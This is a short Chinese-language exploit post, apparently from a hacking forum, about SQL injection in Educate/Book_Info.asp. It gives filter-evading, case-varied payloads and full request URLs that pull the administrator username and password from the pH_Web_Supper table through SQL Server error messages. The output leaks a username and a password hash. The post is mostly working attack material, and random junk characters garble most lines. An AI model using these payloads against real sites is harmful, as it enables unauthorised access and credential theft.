漏洞出现在Educate/Book_Info.asp
0 T, s& b. b+ ]1 V9 |7 C: k: q% L 2 t1 {3 ^! p( B( z# l
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出* V* a* ^9 z5 b, S% I& \9 _: P3 B$ d
7 h' M- l, y/ G# |
exp:如下6 W S$ S& N G/ R3 a* q
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)& D3 I$ F5 }6 J/ ?5 l; E8 r6 \
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) m* |; j% z& ?+ G, @ e
8 |' W# Z, @1 L* qhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 m7 H# n$ f* p. @# u ( f# |9 m' {; }( _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'! U% m3 A, l9 s1 @0 U- S
5 _ m6 H" [; o) s* [: W' q将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。! r$ b# d: U& D% S* ^9 v* v8 _
/ y" a8 Z& u2 J9 U# r7 V3 l1 z
/Educate/Book_Info.asp,行 8
# ^3 H9 y5 f8 R. t
H; Z) d- e: N Q( Phttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
( k3 q: A: c. M. F4 i
. j, ^" C/ ?4 G/ ]$ tMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
@2 G" Q" ~9 f; J) Q
! E v9 H/ }7 s将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
/ r* D; b9 m4 a5 A9 n : A/ S+ }3 @$ ^; E) S P
/Educate/Book_Info.asp,行 8
) p4 r. w4 [& Y! M1 k |